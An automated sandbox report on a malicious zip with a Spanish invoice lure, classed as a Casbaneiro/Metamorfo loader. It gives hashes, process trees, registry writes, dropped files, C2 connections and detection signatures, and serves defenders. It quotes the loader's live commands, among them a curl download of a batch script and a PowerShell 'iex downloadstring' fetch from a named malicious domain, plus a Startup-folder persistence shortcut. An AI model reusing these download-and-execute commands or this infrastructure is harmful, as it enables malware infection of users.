File name:

❉𝔽𝕒𝕔𝕥𝕦𝕣𝕒❉_⑨②①⑤⑤⑥.zip

Full analysis: https://app.any.run/tasks/6ce12164-2c72-4fc0-b489-eaefed9b5749
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: October 31, 2024, 09:20:14
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
arch-scr
opendir
loader
casbaneiro
metamorfo
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5:

BFE545614FBC63695F9755DC371499BF

SHA1:

767EC393FF10827863037839B2B1E6C791B29F08

SHA256:

8A80104DD960E2C8B9A1547E81D157E39A67FD1A96C872924F1ADB2CE84F47CE

SSDEEP:

49152:k8wVGErdTSk9tvdO7pxew9Pv2Bv6idRlF/XfTajbDAQ8AXFPafLwVpnk7pMNnOZE:kHcEMknvdOjeon2564Rz32fAEhrnbG6F

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Generic archive extractor

      • WinRAR.exe (PID: 2928)

    • Connects to the CnC server

      • powershell.exe (PID: 5596)

    • CASBANEIRO has been detected (SURICATA)

      • powershell.exe (PID: 5596)

  • SUSPICIOUS

    • Executing commands from ".cmd" file

      • mshta.exe (PID: 4348)

    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 4348)
      • cmd.exe (PID: 5084)

    • Application launched itself

      • cmd.exe (PID: 5084)

    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 5084)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 5084)

    • Contacting a server suspected of hosting an CnC

      • powershell.exe (PID: 5596)

    • The process drops C-runtime libraries

      • powershell.exe (PID: 5596)

    • Process drops legitimate windows executable

      • powershell.exe (PID: 5596)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 5596)

    • Executes application which crashes

      • _nwxhzv9_Yi7.exe (PID: 7948)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0802
ZipCompression: Deflated
ZipModifyDate: 2024:10:31 09:14:46
ZipCRC: 0x2d18cb2e
ZipCompressedSize: 96
ZipUncompressedSize: 116
ZipFileName: ❉𝔽𝕒𝕔𝕥𝕦𝕣𝕒❉_⑨②①⑤⑤⑥.hta
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
146
Monitored processes
11
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winrar.exe no specs mshta.exe curl.exe conhost.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs #CASBANEIRO powershell.exe _nwxhzv9_yi7.exe conhost.exe no specs werfault.exe

Process information

PID
CMD
Path
Indicators
Parent process
512"C:\Windows\System32\curl.exe" -o "C:\Wins32Update_\up.cmd" "https://firebasestorage.googleapis.com/v0/b/facturaciontbsa.appspot.com/o/bt?alt=media&token=206cdbcb-963a-48cf-87ad-dfbc477aa9cd"C:\Windows\SysWOW64\curl.exe
mshta.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\syswow64\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\ws2_32.dll
c:\windows\syswow64\rpcrt4.dll
2928"C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\AppData\Local\Temp\❉𝔽𝕒𝕔𝕥𝕦𝕣𝕒❉_⑨②①⑤⑤⑥.zipC:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
3848\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4348"C:\Windows\SysWOW64\mshta.exe" "C:\Users\admin\AppData\Local\Temp\Rar$DIa2928.23146\❉𝔽𝕒𝕔𝕥𝕦𝕣𝕒❉_⑨②①⑤⑤⑥.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} C:\Windows\SysWOW64\mshta.exe
WinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\advapi32.dll
5084C:\WINDOWS\system32\cmd.exe /c ""C:\Wins32Update_\up.cmd" "C:\Windows\SysWOW64\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
5596powershell.exe -nop -win 1C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
6584\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execurl.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6680C:\WINDOWS\system32\cmd.exe /S /D /c" echo iex (new-object net.webclient).downloadstring('http://filesadderu.shop/ll2310/at3') "C:\Windows\SysWOW64\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
7948"C:\_nwxhzv9_Y\_nwxhzv9_Yi7.exe" C:\_nwxhzv9_Y\_nwxhzv9_Yi7.exe
powershell.exe
User:
admin
Company:
Oracle Corporation
Integrity Level:
MEDIUM
Description:
Java(TM) Platform SE binary
Version:
8.0.920.14
Modules
Images
c:\_nwxhzv9_y\_nwxhzv9_yi7.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\_nwxhzv9_y\msvcr100.dll
c:\_nwxhzv9_y\jli.dll
7956\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exe_nwxhzv9_Yi7.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
14 470
Read events
14 444
Write events
26
Delete events
0

Modification events

(PID) Process:(2928) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\GoogleChromeEnterpriseBundle64.zip
(PID) Process:(2928) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\❉𝔽𝕒𝕔𝕥𝕦𝕣𝕒❉_⑨②①⑤⑤⑥.zip
(PID) Process:(2928) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(2928) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(2928) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(2928) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(2928) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.hta\OpenWithProgids
Operation:writeName:htafile
Value:
(PID) Process:(4348) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(4348) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(4348) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
Executable files
6
Suspicious files
22
Text files
16
Unknown types
0

Dropped files

PID
Process
Filename
Type
4348mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\ROO[1]text
MD5:AF677947F6C124216B4D8028BF5F572D
SHA256:291706CB16BDB54EBAE46DA012A841864F1FC8A37DAE4D1FF18E15A91719F28E
4348mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199der
MD5:E935BC5762068CAF3E24A2683B1B8A88
SHA256:A8ACCFCFEB51BD73DF23B91F4D89FF1A9EB7438EF5B12E8AFDA1A6FF1769E89D
4348mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EAbinary
MD5:53373FC482DBE858CE47866583CB9D74
SHA256:A76DBB249261213C36503EDED4F90A9CC64EA617584A8611FFD697BC52DF0027
4348mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751binary
MD5:3DFCA46E00FFA4795C72A41375F159D3
SHA256:DCBA1A505396539BAC40A7253C9F5DCCF06CBB79957E21D56305E1FC3AF5F40E
4348mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EAbinary
MD5:900EBB42D591D2F9CCA9F774FE66D50E
SHA256:554F318B11CA30664DD13C3FE8AD42B16E8FCEAF7D48D0316A5F4107C1489DB6
4348mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199binary
MD5:64CF8551D2A4078B4451E401F04F40A1
SHA256:D8FF336E9A5456CB96F4D3FE4709D42E14F9391A05CEFCEB7A4076EC309CE5AF
5596powershell.exeC:\_nwxhzv9_Y\_nwxhzv9_Y._nwxhzv9_Y
MD5:
SHA256:
5596powershell.exeC:\_nwxhzv9_Y\_nwxhzv9_Y.zip
MD5:
SHA256:
5596powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_nwxhzv9_YEX.lnkbinary
MD5:317ABDD4D58D770AB6780ADB97BB2FD3
SHA256:0BD5B3398167211FF2F7DDBC847DD9F9788A624129CFD3C02BB5978BDF616DC3
5596powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_dtn5ip12.jmh.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
14
TCP/UDP connections
56
DNS requests
29
Threats
13

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4348
mshta.exe
GET
200
142.250.186.67:80
http://ocsp.pki.goog/gsr1/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6%2BMgGqMQQUYHtmGkUNl8qJUC99BM00qP%2F8%2FUsCEHe9DWzbNvka6iEPxPBY0w0%3D
unknown
whitelisted
4348
mshta.exe
GET
200
142.250.186.67:80
http://c.pki.goog/r/r1.crl
unknown
whitelisted
4360
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
4348
mshta.exe
GET
200
142.250.186.67:80
http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQC7uIYpw4nJmAnwguIyZivr
unknown
whitelisted
5596
powershell.exe
GET
200
62.72.3.210:80
http://filesadderu.shop/ll2310/at3
unknown
malicious
624
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
5596
powershell.exe
POST
200
62.72.3.210:80
http://62.72.3.210/ldht/index.php
unknown
malicious
7672
SIHClient.exe
GET
200
23.32.185.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
7672
SIHClient.exe
GET
200
23.32.185.131:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
5488
MoUsoCoreWorker.exe
GET
200
2.16.164.9:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
6944
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
7060
RUXIMICS.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5488
MoUsoCoreWorker.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
4348
mshta.exe
62.72.3.210:443
filesatgrupo.shop
PTGi International Carrier Services, Inc.
US
unknown
4348
mshta.exe
172.217.23.106:443
firebasestorage.googleapis.com
GOOGLE
US
whitelisted
4348
mshta.exe
142.250.186.67:80
ocsp.pki.goog
GOOGLE
US
whitelisted
512
curl.exe
172.217.23.106:443
firebasestorage.googleapis.com
GOOGLE
US
whitelisted
4360
SearchApp.exe
104.126.37.170:443
www.bing.com
Akamai International B.V.
DE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 20.73.194.208
  • 40.127.240.158
whitelisted
google.com
  • 216.58.206.78
whitelisted
filesatgrupo.shop
  • 62.72.3.210
unknown
firebasestorage.googleapis.com
  • 172.217.23.106
  • 172.217.16.202
  • 142.250.186.138
  • 142.250.184.234
  • 142.250.74.202
  • 216.58.212.138
  • 216.58.206.74
  • 142.250.185.74
  • 142.250.186.170
  • 142.250.185.106
  • 172.217.16.138
  • 142.250.186.42
  • 142.250.184.202
  • 142.250.186.74
  • 172.217.18.10
  • 142.250.186.106
whitelisted
ocsp.pki.goog
  • 142.250.186.67
whitelisted
c.pki.goog
  • 142.250.186.67
whitelisted
o.pki.goog
  • 142.250.186.67
whitelisted
www.bing.com
  • 104.126.37.170
  • 104.126.37.185
  • 104.126.37.163
  • 104.126.37.179
  • 104.126.37.171
  • 104.126.37.186
  • 104.126.37.177
  • 104.126.37.178
  • 104.126.37.162
  • 104.126.37.153
  • 104.126.37.139
  • 104.126.37.128
  • 104.126.37.145
  • 104.126.37.131
  • 104.126.37.130
  • 104.126.37.144
  • 104.126.37.137
  • 104.126.37.136
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
login.live.com
  • 20.190.159.2
  • 40.126.31.69
  • 20.190.159.68
  • 20.190.159.0
  • 20.190.159.71
  • 40.126.31.73
  • 20.190.159.64
  • 20.190.159.23
whitelisted

Threats

PID
Process
Class
Message
4348
mshta.exe
Not Suspicious Traffic
INFO [ANY.RUN] Attempting to connect to TLS FireBase Storage
512
curl.exe
Not Suspicious Traffic
INFO [ANY.RUN] Attempting to connect to TLS FireBase Storage
5596
powershell.exe
Not Suspicious Traffic
INFO [ANY.RUN] Attempting to connect to TLS FireBase Storage
5596
powershell.exe
Misc activity
SUSPICIOUS [ANY.RUN] Sent Host Name in HTTP POST Body
5596
powershell.exe
Potentially Bad Traffic
SUSPICIOUS [ANY.RUN] Get-WmiObject Cmdlet has been detected
5596
powershell.exe
A Network Trojan was detected
ET MALWARE Horabot Payload Inbound
5596
powershell.exe
A Network Trojan was detected
LOADER [ANY.RUN] Casbaneiro Server Response (Metamorfo)
5596
powershell.exe
A suspicious string was detected
SUSPICIOUS [ANY.RUN] Decoding FromBase64 HTTP URI String
5 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
❉𝔽𝕒𝕔𝕥𝕦𝕣𝕒❉_⑨②①⑤⑤⑥.zip